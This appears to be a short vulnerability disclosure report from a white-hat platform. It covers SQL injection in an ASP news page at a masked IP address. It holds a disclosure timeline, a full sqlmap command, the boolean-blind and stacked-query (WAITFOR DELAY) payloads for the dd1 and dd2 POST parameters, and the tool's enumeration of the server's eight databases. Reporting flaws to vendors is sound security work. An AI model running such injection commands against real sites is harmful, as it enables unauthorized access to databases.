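2015-11-11: Details reported to the vendor; awaiting vendor handling
2015-11-20: Vendor confirmed; details disclosed only to the vendor
2015-11-30: Details disclosed to core white hats and experts in related fields
2015-12-10: Details disclosed to regular white hats
2015-12-20: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public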
As in the title.
sqlmap -u "http://**.**.**.**/DP/Sin/News.asp" --data "B1=%EF%BF%BDe%EF%BF%BDX&mm1=11&dd1=04&yy2=2015&mm2=11&dd2=09&yy1=2015" --dbs
Parameter: dd2 (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: B1=%EF%BF%BDe%EF%BF%BDX&mm1=11&dd1=04&yy2=2015&mm2=11&dd2=09' AND 6128=6128 AND 'mxVw'='mxVw&yy1=2015

Parameter: dd1 (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: B1=%EF%BF%BDe%EF%BF%BDX&mm1=11&dd1=04' AND 5334=5334 AND 'DTCl'='DTCl&yy2=2015&mm2=11&dd2=09&yy1=2015

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: B1=%EF%BF%BDe%EF%BF%BDX&mm1=11&dd1=04';WAITFOR DELAY '0:0:5'--&yy2=2015&mm2=11&dd2=09&yy1=2015
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: dd1, type: Single quoted string (default)
[1] place: POST, parameter: dd2, type: Single quoted string
[q] Quit
>
[18:29:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[18:29:04] [INFO] fetching database names
[18:29:04] [INFO] fetching number of databases
[18:29:04] [INFO] resumed: 8
[18:29:04] [INFO] resumed: Berich
[18:29:04] [INFO] resumed: Berich_GL
[18:29:04] [INFO] resumed: master
[18:29:04] [INFO] resumed: model
[18:29:04] [INFO] resumed: msdb
[18:29:04] [INFO] resumed: Northwind
[18:29:04] [INFO] resumed: pubs
[18:29:04] [INFO] resumed: tempdb
available databases [8]:
[*] Berich
[*] Berich_GL
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[18:29:04] [INFO] fetched data logged to text files under '/root/.sqlmap/output/**.**.**.**'
[*] shutting down at 18:29:04
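Severity: High
Vulnerability Rank: 15
Confirmation time: 2015-11-20 06:30
Thank you for the report.
2016-01-07: After receiving the report, HITCON emailed the service mailbox listed on the website multiple times; there has been no response so far.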